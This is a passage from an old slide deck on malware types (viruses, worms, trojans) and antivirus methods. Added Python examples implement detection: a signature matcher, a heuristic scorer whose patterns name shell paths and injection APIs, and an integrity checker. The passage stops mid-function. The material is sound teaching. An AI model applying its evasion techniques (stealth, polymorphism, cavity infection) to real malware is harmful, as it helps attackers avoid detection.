software security malware: trojans, virii, and worms


Upload: laurence-snow

Post on 24-Dec-2015


Software Security
Malware: Trojans, Virii, and Worms

SECURITY INNOVATION ©2003

A Subject Overview

Viruses
Worms
Trojans

Topics

• General Definitions
  – Viruses
  – Trojans
  – Worms
• In depth info
  – Viruses
  – Trojans
  – Worms
• Anti Virus Technologies

Definitions

• Virus - code that copies itself into other programs.
• A “Bacteria” replicates until it fills all disk space, or CPU cycles.
• Payload - harmful things the malicious program does, after it has had time to spread.
• Worm - a program that replicates itself across the network (usually riding on email messages or attached documents, e.g., macro viruses).
• Trojan Horse - instructions in an otherwise good program that cause bad things to happen (sending your data or password to an attacker over the net).
• Logic Bomb - malicious code that activates on an event (e.g., a date).
• Trap Door (or Back Door) - undocumented entry point written into code for debugging that can let in unwanted users.
• Easter Egg - extraneous code that does something “cool.” A way for programmers to show that they control the product.

Computer Viruses (and other “Malicious Programs”)

• Computer “Viruses” and related programs have the ability to replicate themselves on an ever increasing number of computers. They originally spread by people sharing floppy disks. Now they spread primarily over the Internet (a “Worm”).
• Other “Malicious Programs” may be installed by hand on a single machine. They may also be built into widely distributed commercial software packages. These are very hard to detect before the payload activates (Trojan Horses, Trap Doors, and Logic Bombs).

Viruses

What exactly is a Virus?

• A term mistakenly applied to trojans and worms
• Small program that negatively alters the way a computer works
• Self replicating
• Done without user knowledge or intervention
  – still needs to be activated initially by the user
• There are over 60,000 Viruses, Trojans, and Worms today!
  – Many are obsolete
  – New viruses are more and more lethal

What a Virus isn’t – Common Assumptions

• Equipment Failure
• Power surges/brownouts/spikes
• Magnets (that 8” subwoofer next to your case)
• Conflicting hardware drivers
• Settings or other changes made by someone else (i.e. clueless techie)
• Something made by Microsoft

Viruses - Beginnings

• First real virus called “Cloner” was written by 9th grader Rich Skrenta in 1982 for the Apple II:

  It will get on all your disks
  It will stick to you like glue
  It will infiltrate your chips
  It will modify ram too
  Yes it's Cloner!
  Send in the Cloner!

• First major PC virus was called “Brain”¹ in 1986
• Came from two brothers running a computer store in Lahore, Pakistan
  – Designed to prevent doctors from pirating their software by infecting pirated copies
  – “Infecting” only put a copyright notice in the program’s directory of floppy disks

¹ Although it was called The Brain virus it actually contained the authors’ phone numbers!

Viruses – Design Factors

• Ultimate goal is to spread as far as possible (both on the box and globally) before being wiped out
• Infection and Detection are mutually limiting factors
• The functional logic of an executable file virus is as follows:
  – Search for a file to infect
  – Open the file to see if it is infected
  – If infected, search for another file
  – Else, infect the file
  – Return control to the host program

Viruses – Life Cycle

• Before it takes any action it reproduces itself
  – Virus writers balance infection with detection
• On a defined trigger, it modifies your system in some way
  – Delete files, format drives, or shut down programs
  – Eat up system resources
  – Alter data

Viruses – What’s with the names?

• Names are determined by CARO
• Each unique virus is given a family name
  – Family names are derived from a quirk, the way it infects, or something else unique to the virus
• Each virus is further identified with prefixes and suffixes
  – Tells you what it does, how it infects
• Variants of a virus are given a suffix of .A to .ZZZ
• The naming of a virus follows the format: prefix “family name” suffix [suffix2, suffix3, …]
• Example: W32.Bugbear@mm, one of the most lethal viruses out there
  – W32 : File infector/boot sector virus
  – Bugbear : unique family name
  – @mm : Mass Mailing distribution – uses standard techniques and email to distribute itself
• Every virus can be uniquely identified by its signature as well
  – binary representation of its machine code
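As an added example (not part of the original slides), the following Python parser splits a name of the prefix.family[.variant][@modifier] shape the slide describes into its components and turns the .A to .ZZZ variant suffix into a sequence number. The grammar is a simplified assumption made for this example, not the full CARO specification, and the only prefix and modifier meanings it knows are the ones the slide gives for W32.Bugbear@mm.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Simplified name grammar (an assumption for this example, not the full CARO spec):
#   <prefix>.<family>[.<variant>][@<modifier>]...
# <variant> is one to three upper-case letters (.A to .ZZZ, as on the slide);
# each @<modifier> is a behaviour/distribution flag such as @mm.
NAME_RE = re.compile(
    r"^(?P<prefix>[A-Za-z0-9]+)\."        # platform/type prefix, e.g. W32, VBS, W97M
    r"(?P<family>[A-Za-z0-9_-]+)"         # unique family name, e.g. Bugbear
    r"(?:\.(?P<variant>[A-Z]{1,3}))?"     # optional variant suffix .A .. .ZZZ
    r"(?P<mods>(?:@[A-Za-z]+)*)$"         # zero or more @modifier suffixes
)

# Meanings taken from the slide; anything not listed is reported as unknown.
PREFIX_MEANING = {"W32": "File infector/boot sector virus"}
MODIFIER_MEANING = {"mm": "Mass Mailing distribution (spreads itself by email)"}


@dataclass
class MalwareName:
    prefix: str
    family: str
    variant: Optional[str]
    modifiers: List[str] = field(default_factory=list)

    def describe(self) -> List[str]:
        """Human-readable breakdown, one line per component."""
        lines = [f"prefix {self.prefix}: {PREFIX_MEANING.get(self.prefix.upper(), 'unknown prefix')}",
                 f"family {self.family}: unique family name"]
        if self.variant:
            lines.append(f"variant .{self.variant}: variant number {variant_ordinal(self.variant)}")
        for m in self.modifiers:
            lines.append(f"@{m}: {MODIFIER_MEANING.get(m.lower(), 'unknown modifier')}")
        return lines


def parse_name(name: str) -> MalwareName:
    """Split a name into its components; raise ValueError if it does not fit the grammar."""
    m = NAME_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a prefix.family[.variant][@modifier] name: {name!r}")
    mods = [x for x in m.group("mods").split("@") if x]
    return MalwareName(m.group("prefix"), m.group("family"), m.group("variant"), mods)


def is_valid_name(name: str) -> bool:
    return NAME_RE.match(name.strip()) is not None


def variant_ordinal(variant: str) -> int:
    """Map .A -> 1, .Z -> 26, .AA -> 27, ... .ZZZ -> 18278 (bijective base 26):
    the position of a variant in the .A to .ZZZ sequence."""
    n = 0
    for ch in variant:
        n = n * 26 + (ord(ch) - ord("A") + 1)
    return n


def same_family(a: MalwareName, b: MalwareName) -> bool:
    """Two names refer to variants of one virus when prefix and family agree."""
    return (a.prefix.upper(), a.family.lower()) == (b.prefix.upper(), b.family.lower())


if __name__ == "__main__":
    for n in ("W32.Bugbear@mm", "W32.Bugbear.B@mm", "VBS.LoveLetter.A"):
        print(n)
        for line in parse_name(n).describe():
            print("   ", line)
```

In triage this is mainly useful for grouping vendor detections: two names that agree on prefix and family are the same virus, whatever the variant letter or @modifier, which is why same_family() ignores those parts. Real vendor names carry extra fields that this regex rejects, so treat a ValueError as "needs a human look", not as "not malware".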


Taxonomy of Malicious Programs

(Figure: a tree dividing malicious programs by whether they need a host program. Needs host program: Trapdoors, Logic Bombs, Trojan Horses, Viruses. Independent: Worms, Bacteria.)

Virus Phases

• Dormant - waits for a trigger to start replicating
• Propagation - copies itself into other programs of the same type on a computer. Spreads when the user shares a file with another computer. Usually searches a file for its own signature before infecting.
  – Worms (like Melissa) spread over a network connection as executable attachments to email.
• Triggering - starts delivering payload. Sometimes triggered on a certain date, or after a certain time after infection.
• Execution - payload function is done. Perhaps it put a funny message on the screen, or wiped the hard disk clean. It may then start the first phase over again.

Types of Viruses

• Parasitic Virus - attaches itself to executable files as part of their code. Runs whenever the host program runs.
• Memory-resident Virus - lodges in main memory as part of the resident operating system.
• Boot Sector Virus - infects the boot sector of a disk, and spreads when the operating system boots up (original DOS viruses).
• Stealth Virus - explicitly designed to hide from Virus Scanning programs.
• Polymorphic Virus - mutates with every new host to prevent signature detection.

Viruses – are there “Good” ones?

Possible ideas for a “good” virus are:
• An Anti-Virus Virus
  – Find other viruses and kill them
• File Compressor Virus
  – Compresses the file it infects
• Encryption Virus
  – Infects boot sector and encrypts the disk with a user supplied password
• Maintenance Virus
  – Traverse a network and perform maintenance functions on individual machines

Viruses – are there “Good” ones?

“Good” viruses won’t succeed for many reasons
• Technical
  – Lack of control
  – Recognition difficulty (a virus is still a virus)
  – Wasting resources
  – Containment
  – Compatibility problems
• Legal and Ethical
  – Unauthorized data modification
  – Copyright and ownership problems
  – Misuse
  – Responsibility – “It was just research”, “You were sharing copyrighted files anyways”

Viruses – are there “Good” ones?

• Psychological
  – Trust Problems
    • People like having total control of their system
  – Negative common meaning
    • It’s still a virus
    • Would you buy a car that was called “Doesn’t Move”? (ex. Chevy Nova)

Virus Characteristics

• Boot sector
  – Can’t infect across networks due to protocol restrictions
• Multipartite
  – Combination of Boot Sector and File Infector…therefore, this type can spread over networks. Very nasty.
• Stealth
  – Hides its signature through various means, such as encryption. Also, by “Polymorphic” means.

Viruses – Classification by Infection Targets

• System sector/Boot viruses
  – Infect the system sectors of disks & hard drives
• File/Parasitic viruses
  – .COM and .EXE files, most typical
• Batch file & Macro viruses
  – Use text batch files or Word/Excel macros
• Cluster viruses
  – Infect the directory structures
• Companion/Spawn viruses
  – Adds infected file to system startup
• Source code viruses
  – Add additional code to program source code
• VB Script viruses
  – Use Windows Scripting Host to control the machine

Viruses – System Sector/Boot Viruses

• Share with Macro viruses the distinction of infecting the most machines
• Infect the master boot record (MBR) or boot sector of disks
• Useful to virus writers because this area of the disk is invisible to the user
• Area of disk is small (512 bytes), so viruses store the actual virus somewhere else on the disk and mark it as bad in the MBR
  – Do this to avoid being detected by system scans
• Some Mac viruses infect upon the disk being inserted

Viruses – System Sector/Boot Viruses

• System Sector Viruses
  – Stealth Component
    • Memory resident viruses of this type can foil sector editing programs by reporting back a saved copy of the original overwritten blocks
  – Multiple Part
    • Infect both system sectors and files
    • Infected files drop the virus on infected systems

Viruses – Batch File Viruses

• Are .BAT script files that contain assembly code within them
• Utilize a special handle in batch scripting that tells it to interpret the commands after it as assembly
• Can run the payload themselves, or can create a separate file and run it

Macro Viruses

• Microsoft Office applications allow “macros” to be part of the document. The macro could run whenever the document is opened, or when a certain command is selected (Save File).
  – Targets particular data files
  – Uses application’s macro interpreter
• A macro virus can delete files, generate email, edit letters, or mail itself to everyone on internal mail-address lists.

Viruses – Macro Viruses

• Regular data files did not propagate viruses
  – Viruses had to be executed manually and loaded into memory
• Programs such as the Microsoft Office Suite incorporated macros with regular data files
  – Macros are run upon loading the file and infect the system
• Plain-text email with macro attachments can be automatically run upon opening or previewing the message
  – Bubbleboy (actually a worm) did this
• Melissa - the first virus to be both a Word macro virus and to use the Outlook Express address book
• Tristate – macro virus that infected Word, Excel, and PowerPoint

Viruses – File (Parasitic) Viruses

• Locate and infect .EXE .COM .OVL .DLL files
• Overwrite part of the program’s code with a copy of itself
• Are not as widespread as system sector and macro viruses

Viruses – File (Parasitic) Viruses

• Simple File Viruses
  – After transplanting itself in the executable, the executable often doesn’t work
• Stealth Component
  – Work very similar to stealth system sector viruses
  – Mask the file size of infected files when a directory listing is done on them

File Infectors

• Must be executed to spread or deliver payload.
• Payloads may be event-driven (Logic/Time Bomb).
• Resident viruses remain in memory to infect programs as they are run.
• May spread by many means:
  – over networks,
  – from diskettes (sneaker-net),
  – from downloads.

File Infectors

(Figure: layouts of an infected file. Original .COM: the program runs from Start to End. Prepended virus (.COM): the virus code is placed before the program, so it runs first and then continues into the original program. Appended virus (.COM & .EXE): the virus code is placed after the program’s End, and a Jump at the program’s start transfers control to the virus code before the program itself runs. Legend: virus code vs. program flow.)

Viruses – Cluster Viruses

• Infect directory information in the file system rather than the file
  – When user tries to run the program, the virus is run instead
  – To remain stealthy, the virus then locates the file and runs it
• If you boot without the virus in memory, utilities will report serious problems with the file system
  – allowing the utility to fix them will erase programs in the infected directories

Viruses – Companion/Spawn Viruses

• Legacy virus – takes advantage of the way DOS executes .COM files before .EXE files
  – Infects by making a .COM file with the same name as a .EXE
  – Relies on most users omitting the extension (typing prog rather than prog.exe) when typing a command
• This method and the cluster method are the only ways viruses can infect files without modifying them
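Because a companion virus never modifies the .EXE it shadows, a hash or size baseline of that .EXE stays clean; the only artefact is the extra .COM with the same base name. As an added example (not part of the original slides), this Python check walks a directory for exactly that .COM/.EXE shadowing relationship and attaches a couple of triage hints. The directory it scans is a constructed temporary one with placeholder bytes, and the hints in suspicion_notes() are assumptions of mine, not rules from the slide.

```python
import os
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# DOS command resolution as the slide describes it: a bare name such as "prog"
# runs prog.com in preference to prog.exe. A companion virus therefore plants a
# .com next to an existing .exe and never touches the .exe itself, so hash- or
# size-based integrity checks on the .exe see nothing. The check below looks
# for that shadowing relationship in one directory.


def find_companion_pairs(directory: os.PathLike) -> List[Tuple[Path, Path]]:
    """Return (com, exe) pairs that share a base name, sorted by name.
    Matching is case-insensitive because DOS file names are."""
    by_stem: Dict[str, Dict[str, Path]] = {}
    for entry in Path(directory).iterdir():
        if entry.is_file() and entry.suffix.lower() in (".com", ".exe"):
            by_stem.setdefault(entry.stem.lower(), {})[entry.suffix.lower()] = entry
    return [(f[".com"], f[".exe"]) for _, f in sorted(by_stem.items())
            if ".com" in f and ".exe" in f]


def suspicion_notes(com: Path, exe: Path) -> List[str]:
    """Cheap triage hints for a pair (assumed heuristics, not the slide's rules).
    A pair with no notes may simply be a program that ships both forms."""
    notes = []
    if com.stat().st_mtime > exe.stat().st_mtime:
        notes.append(".com is newer than the .exe it shadows")
    if com.stat().st_size < 4096:
        notes.append(".com is tiny compared with a real program")
    return notes


def build_demo_dir() -> Path:
    """Constructed sample directory: one shadowed program and one unshadowed one.
    File contents are placeholder bytes, not executables."""
    d = Path(tempfile.mkdtemp(prefix="companion-demo-"))
    (d / "edit.exe").write_bytes(b"MZ" + b"\x00" * 4094)
    (d / "prog.exe").write_bytes(b"MZ" + b"\x00" * 4094)
    old = 1_000_000_000
    os.utime(d / "prog.exe", (old, old))        # pretend prog.exe has been there for years
    (d / "PROG.COM").write_bytes(b"\x90" * 64)  # upper-case name: DOS does not care
    return d


def report(directory: os.PathLike) -> Dict[str, List[str]]:
    """Map each shadowed .exe name to the triage notes for its companion."""
    return {exe.name: suspicion_notes(com, exe)
            for com, exe in find_companion_pairs(directory)}


if __name__ == "__main__":
    demo = build_demo_dir()
    for exe_name, notes in report(demo).items():
        print(f"{exe_name} is shadowed by a .COM: {'; '.join(notes) or 'no further hints'}")
```

A reported pair is a lead, not a verdict: some legitimate packages really do ship a small .COM loader beside an .EXE, so the notes exist to rank pairs for a human, and the same walk should be repeated across every directory on the PATH, since that is where a bare command name is resolved.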


Viruses – Source Code and VB Script Viruses

• Source code viruses seek out source code on an infected computer and add additional malicious code to it
  – Not very popular
    • Not many people program/compile code on their computer
• VB Script viruses are extremely popular because everyone running IE5 or higher can become infected
  – Allows rogue code to execute arbitrary commands on your system
  – Ex: Many VB script viruses email themselves in Outlook & Outlook Express just like worms do

VBS Viruses

• ILoveYou Virus
  – E-mail attachment in “VBS”.
  – Attempts to spread to default Outlook address book contacts
  – Installs a password-grabbing program, forwarding to an Online Chat Room
  – Overwrites some files

Viruses – by Infection Methods

• Polymorphic Viruses
• Metamorphic
• Stealth Viruses
• Fast and Slow infections
• Sparse Infectors
• Armored Viruses
• Multipartite Viruses
• Cavity Viruses
• Tunneling Viruses
• NTFS Stream Viruses

Viruses - Polymorphic

• Polymorphic viruses change with each infection
• Polymorph/Mutation engines allow virus authors to make their virus polymorphic automatically
• Simple polymorph engines insert “NOPS” into the assembly code of a virus
  – Very easy to detect
• Other simple polymorphic viruses can encrypt themselves with random keys
• More complex mutation engines insert junk code into the virus
  – Junk code must not interfere with the real executing code!
• Ideal polymorph engines for authors would create a truly unique virus every time
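The slide says NOP insertion is “very easy to detect”; the added Python example below (not code from the original slides) shows why, by comparing a verbatim signature match against a matcher that tolerates runs of NOPs between the signature bytes. The virus body and the three file images are constructed stand-ins with arbitrary byte values, and the matcher is my own illustration of the idea rather than any product’s engine.

```python
import re
from typing import Dict

# Constructed stand-in for a virus body: the byte values are arbitrary and carry
# no meaning here; only the matching logic matters.
CORE = bytes([0xB8, 0x4C, 0x00, 0xCD, 0x21, 0xC3])
NOP = 0x90  # x86 one-byte no-op, the filler a simple polymorph engine inserts

# Constructed samples. "nop_variant" is CORE with NOPs scattered between its
# bytes (what the slide's "simple polymorph engine" produces); "clean" is
# unrelated data of the same shape.
SAMPLES: Dict[str, bytes] = {
    "original": b"MZ\x00\x01" + CORE + b"\x00" * 8,
    "nop_variant": b"MZ\x00\x01"
    + bytes([0xB8, NOP, 0x4C, NOP, NOP, 0x00, 0xCD, NOP, 0x21, 0xC3])
    + b"\x00" * 8,
    "clean": b"MZ\x00\x01" + bytes(range(16)),
}


def exact_signature(sig: bytes) -> re.Pattern:
    """1st-generation style: the signature bytes must appear verbatim."""
    return re.compile(re.escape(sig))


def nop_tolerant_signature(sig: bytes) -> re.Pattern:
    """Same signature, but any run of NOPs is allowed between consecutive
    signature bytes (and nowhere else). That is what defeats NOP insertion
    without discarding legitimate 0x90 bytes elsewhere in the file."""
    gap = re.escape(bytes([NOP])) + b"*"
    return re.compile(gap.join(re.escape(bytes([b])) for b in sig))


def matches(pattern: re.Pattern, data: bytes) -> bool:
    return pattern.search(data) is not None


def scan(data: bytes, sig: bytes = CORE) -> Dict[str, bool]:
    """Run both matchers over one file image."""
    return {"exact": matches(exact_signature(sig), data),
            "nop_tolerant": matches(nop_tolerant_signature(sig), data)}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:12s} {scan(data)}")
```

Two caveats carry over to real scanners: a six-byte signature is far too short for production use (it would fire on unrelated files), and the tolerant pattern only answers the NOP trick. The encrypted-with-random-key and junk-code variants the slide lists next leave no fixed bytes to match, which is where the heuristic and activity-based generations of detection come in.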


Viruses – Metamorphic

• Change virus structure and decryption engine to evade signature matching
  – Example – W32.Simile virus
    • Creates a copy from the decrypted virus
    • Takes out unused and extraneous code to get a “Core Virus”
    • Re-mutates the virus by moving and splitting functions
    • Adds extra unused/redundant code and a modified decryption engine

Viruses – Stealth

• In order to infect a system the virus must make some changes to the system
• Stealth viruses are memory resident viruses that act as a blindfold to system processes
• Used to avoid detection and examination by the system
• Utilized by many viruses:
  – File – return the original size of infected file when queried
  – Cluster – run the virus first, then run the user’s intended program
  – System Sector/Boot – report bad blocks on disk where virus is located

Viruses – Fast/Slow Infectors

• Come from different methods of infection
  – Fast infector – spreads fast, doesn’t care about detection
  – Slow infector – spreads randomly, avoids detection
• Fast infector – infects when a file is accessed/run
  – Takes advantage of anti-virus scans
    • Scanner opens up every file
    • Fast infector infects the recently opened file
• Slow infector – infects when a file is created/modified
  – Tries to “defeat integrity checking software by piggybacking on top of the process which legitimately changes a file”

Viruses – Sparse, Armored, and Multi Part Viruses

• Sparse infectors aim to be widespread and undetected
  – Use a variety of techniques to infect & remain undetected such as:
    • Infect every Nth time a file is accessed
    • Every file with a specific string
    • Every time a specific keystroke occurs
• Armored viruses use special tricks to make the tracing, disassembling, and understanding of their code more difficult.¹
  – Do this by attempting to confuse the virus scanner trying to find its exact location, among other tricks
• Multi Part viruses are a combination of system sector and file infector viruses

¹ http://kb.indiana.edu/data/aehs.html

Viruses – Cavity Viruses

• Cavity viruses exploit gaps in program files and insert themselves inside, similar to a typical file virus
  – A new Windows file format called the “Portable Executable”, designed to decrease load times, has many blank gaps inside the file
• File/Parasitic Viruses are similar to cavity viruses but are not as crafty
• Both types of viruses use some kind of stealth protection as well

Viruses – Tunneling Viruses

• Tunneling viruses strip hardware interrupts of any programs monitoring redirection
  – Enables viruses to go undetected and infect other programs
• This same method is used by anti-virus programs as well to prevent being detected by viruses upon load
• Tunneling viruses can get into a “war” with the anti-virus program over who will be in control of interrupts

Viruses – NTFS Alternate Viruses – NTFS Alternate Data StreamsData Streams

• NTFS partitions can store data in a file and not NTFS partitions can store data in a file and not increase the size whatsoeverincrease the size whatsoever

• Data is invisible to normal system tools and Data is invisible to normal system tools and programsprograms

• You can clean a file manually by copying it to You can clean a file manually by copying it to another file system (one that is not formatted another file system (one that is not formatted NTFS) and back againNTFS) and back again

Virus Detection

• 1st Generation, Scanners: searched files for any of a library of known virus "signatures." Checked executable files for length changes.
• 2nd Generation, Heuristic Scanners: look for more general signs than specific signatures (code segments common to many viruses). Checked files for checksum or hash changes.
• 3rd Generation, Activity Traps: stay resident in memory and look for certain patterns of software behavior (e.g., scanning files).
• 4th Generation, Full Featured: combine the best of the techniques above.

Anti-Virus Technologies

• Scanners
  – Interceptors
  – Disinfectors
  – Heuristics
• Inoculators
• Integrity Checkers
• Safe Computing (aka Common Sense)
• NBAR/QoS
• EICAR test string
• Anti-Virus Packages

Anti-Virus Technologies – Scanners

• Scanners consist of a twofold method of protection
  – File scanning
  – Background checking (interceptors)
• Check for viruses by analyzing for virus signatures
  – Works on known viruses that are unencrypted
  – Unknown viruses can be detected by monitoring activity
  – False alarms are issued; newer technologies are improving this
  – Only as good as the last update
• Speed up scanning in various ways (part of heuristics)
  – By only scanning .EXEs for file viruses, boot sectors for boot viruses, etc.
  – Algorithms to scan only sections of the file rather than the whole
• Disinfectors are also built into any reputable scanner
  – Can remove a virus from a file, but often cannot do so without damaging the file
  – If files cannot be disinfected safely, they can be quarantined
  – Still does not mean your system is safe

Anti-Virus Technologies – Heuristics

• Check for viruses by using heuristics
  – 70-80% success rate
  – Unknown viruses can be detected
• Look at characteristics of a file to determine the probability of it being infected
• Can find and stop some new viruses from executing
  – Used to find viruses that have no fixed signature (polymorphic and metamorphic viruses)
    • These viruses expand/contract in size
    • Use encryption as well, so the body of the virus looks like random data
  – Use a point system to detect
    • Certain actions or characteristics are worth a certain number of points
    • If enough points accumulate, the scanner raises an alarm
  – The same rules can be applied to decide what not to scan
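The point system described above, as an added example (not code from the original slides or from any product): a static scorer that adds up weighted indicators and alarms only when the total crosses a threshold. The indicator weights, the entropy limit and the three sample inputs are constructed for illustration. Shannon entropy is the usual way to spot an encrypted or packed body: plain code and text sit around 4-6 bits per byte, cipher text near 8.

```python
import math
import re

# Indicator weights are an assumption for illustration; real products tune
# them against large corpora of clean and infected files.
WEIGHTS = {
    "high_entropy": 40,   # body looks encrypted/packed (polymorphic decryptor + cipher text)
    "shell_path": 25,     # embedded command-interpreter path
    "injection_api": 20,  # names of APIs used to write into other processes
}
ALARM_THRESHOLD = 50     # a single indicator is never enough on its own
ENTROPY_LIMIT = 7.0      # bits per byte; plain code and text sit well below this

SHELL_PATH = re.compile(rb"/bin/sh|/bin/bash|cmd\.exe")
INJECTION_API = re.compile(rb"CreateRemoteThread|WriteProcessMemory|ptrace")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the buffer: 0.0 for a constant, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def heuristic_score(data: bytes):
    """Add up the points for every indicator present; return (score, reasons)."""
    reasons = []
    if shannon_entropy(data) > ENTROPY_LIMIT:
        reasons.append("high_entropy")
    if SHELL_PATH.search(data):
        reasons.append("shell_path")
    if INJECTION_API.search(data):
        reasons.append("injection_api")
    return sum(WEIGHTS[r] for r in reasons), reasons


def is_suspicious(data: bytes) -> bool:
    return heuristic_score(data)[0] >= ALARM_THRESHOLD


# Constructed samples, not real files.
CLEAN_TEXT = b"Quarterly report: revenue up 4%, costs flat.\n" * 20
PACKED_ONLY = bytes(range(256)) * 4                     # uniform bytes, entropy 8.0: a compressed archive, say
PACKED_WITH_SHELL = PACKED_ONLY + b"\x00/bin/sh\x00"   # encrypted body plus a shell string

if __name__ == "__main__":
    for name, sample in [("clean text", CLEAN_TEXT), ("packed only", PACKED_ONLY),
                         ("packed + shell", PACKED_WITH_SHELL)]:
        score, reasons = heuristic_score(sample)
        print(f"{name:15s} score={score:3d} reasons={reasons} alarm={is_suspicious(sample)}")
```

The threshold is what keeps the false-alarm rate down: a compressed archive trips the entropy indicator alone and stays under 50, while the same bytes plus a shell path cross it. The 70-80% figure on the slide is the other side of that trade; a virus with none of the chosen indicators scores zero.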

Anti-Virus Technologies – Inoculators

• Mark sectors and files as already infected in the usual spot where viruses look, so the virus skips them
  – Doesn't work anymore today (the marker only fools the one virus that uses it)
• Make programs self-checking
  – Insert code at the beginning of the program to compare data generated by the code (a checksum of the program) to stored data
    • Can be circumvented by stealth viruses
    • Check code/stored code can be modified
    • Sets off alarms for interceptors, because the program now modifies itself
    • Prevents some programs from working

Anti-Virus Technologies – Integrity Checkers

• Viruses infect/attack by making changes to the system
• Integrity checkers monitor system changes
  – Initially scan the disk and record a unique "signature" (a checksum or cryptographic hash) for all files and partitions
  – Can alert the user to a virus when certain changes are made
  – Allow you to see what damage has been done by a virus
  – Ideally can be used to detect unknown viruses
• Things holding integrity checkers back
  – Must be combined with a good scanner; stand-alones don't work (a change is flagged, but not what caused it, and the baseline is only as clean as the system it was taken on)
  – Scanners that incorporate these checkers don't incorporate them effectively
    • Not checking enough changes
  – Some checkers are slow and unwieldy
• Can also be used to detect system break-ins
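An integrity checker of the kind described above, as an added example (not code from the original slides or from any product): take a baseline of size and SHA-256 for every file under a directory, take it again later, and report what was added, removed or modified. The demo scenario is constructed: it simulates a parasitic infection (the host grows), a cavity infection (same size, bytes changed), a dropped file and a deleted file. The file names in it are illustrative only.

```python
import hashlib
import os
import tempfile

CHUNK = 1 << 16


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def take_baseline(root: str) -> dict:
    """Record size and SHA-256 for every regular file under root, keyed by POSIX-style relative path."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = {"size": os.path.getsize(full), "sha256": sha256_file(full)}
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Diff two snapshots. A modified file whose size did not change is the
    cavity-virus case that a first-generation length check would miss."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = {}
    for rel in set(baseline) & set(current):
        if baseline[rel]["sha256"] != current[rel]["sha256"]:
            modified[rel] = {"size_changed": baseline[rel]["size"] != current[rel]["size"]}
    return {"added": added, "removed": removed, "modified": modified}


def _write(root: str, rel: str, data: bytes) -> None:
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def demo() -> dict:
    """Constructed scenario in a temporary tree; returns the compare() report."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "bin/ls", b"\x7fELF" + b"\x00" * 60)
        _write(root, "bin/login", b"\x7fELF" + b"\x00" * 60)
        _write(root, "etc/inetd.conf", b"ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd\n")
        baseline = take_baseline(root)

        # Parasitic infection: code appended, file grows.
        _write(root, "bin/ls", b"\x7fELF" + b"\x00" * 60 + b"VIRUS")
        # Cavity infection: padding overwritten, size unchanged (still 64 bytes).
        _write(root, "bin/login", b"\x7fELF" + b"\x00" * 30 + b"VIRUS" + b"\x00" * 25)
        # Dropped file and deleted file.
        _write(root, "tmp/.unlock", b"#!/bin/sh\n")
        os.remove(os.path.join(root, "etc", "inetd.conf"))

        return compare(baseline, take_baseline(root))


if __name__ == "__main__":
    for kind, items in demo().items():
        print(kind, items)
```

Two operational points follow from the slide: the baseline has to be taken on a known-clean system and kept where the virus cannot rewrite it (write-protected media, or another host), and every legitimate update shows up as "modified" too, which is why the checker needs a scanner beside it to say which changes matter.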

Anti-Virus Technologies – Common Sense!

• Do not leave a floppy disk in the floppy disk drive when you shut down or restart the computer
• Write-protect your floppy disks after you have finished writing to them
• Be suspicious of email attachments from unknown sources
• Verify that attachments were really sent by the author of the email. Newer viruses send email messages that appear to be from people you know
• Do not set your email program to "auto-run" attachments or auto-preview
• Obtain all Microsoft security updates
• Back up your data frequently. Keep the (write-protected) media in a safe place, preferably in a different location than your computer
• Disable Windows Scripting Host
• Look at extensions: megadeth_song.exe, familyvacation.com
• Watch out for double extensions: corvette.jpg.exe (Explorer hides known extensions by default, so this displays as corvette.jpg)

Anti-Virus Technologies – NBAR/QoS

• You can use Cisco's Network Based Application Recognition (a QoS feature included in their latest routers) to get rid of Code Red traffic
  – Set up an HTTP filter by URL with a text string unique to the worm's request (Code Red asks for default.ida)
  – Attach it to its own class map
  – Attach the class map to a policy map
  – Have the policy set DSCP to 1 on matching packets (a value usually not used in a configuration)
  – Block the marked Code Red attempts with an ACL that denies dscp 1

Anti-Virus Technologies – EICAR Group

• The EICAR test string is not a real virus
• Used in testing and development of anti-virus software
• Looks similar to the following (the published test file is exactly 68 bytes; the string as printed here differs from it in the first nine characters):
  %^$#!FP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
• EICAR's mission statement:
  "EICAR combines universities, industry and media plus technical, security and legal experts from civil and military government and law enforcement as well as privacy protection organizations whose objectives are to unite efforts against writing and proliferation of malicious code like computer viruses or Trojan Horses, and, against computer crime, fraud and the misuse of computers or networks, inclusive malicious exploitation of personnel data, based on a code of conduct."
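A first-generation signature scanner tested against the EICAR file, as an added example (not code from the original slides or from EICAR): a generic byte-pattern search over a signature library, plus the rule that makes a file the EICAR test file as EICAR specifies it (the 68-byte string, optionally followed by whitespace, 128 bytes at most). The string is assembled from two halves at runtime so that it never appears whole in this document; the one-entry signature library stands in for the thousands a real product ships.

```python
# Joined at runtime, this is exactly the published 68-byte EICAR test string.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$" + b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
assert len(EICAR) == 68

# Whitespace EICAR allows after the string: space, tab, LF, CR, CTRL-Z.
EICAR_TRAILER = b" \t\r\n\x1a"

# First-generation signature library: name -> byte pattern. One entry here;
# a real scanner loads thousands from its update file.
SIGNATURES = {
    "EICAR-Test-File": EICAR,
}


def is_eicar_test_file(data: bytes) -> bool:
    """True only for a file that *is* the EICAR test file as specified:
    the 68-byte string first, only whitespace after it, 128 bytes total at most."""
    return (
        len(data) <= 128
        and data.startswith(EICAR)
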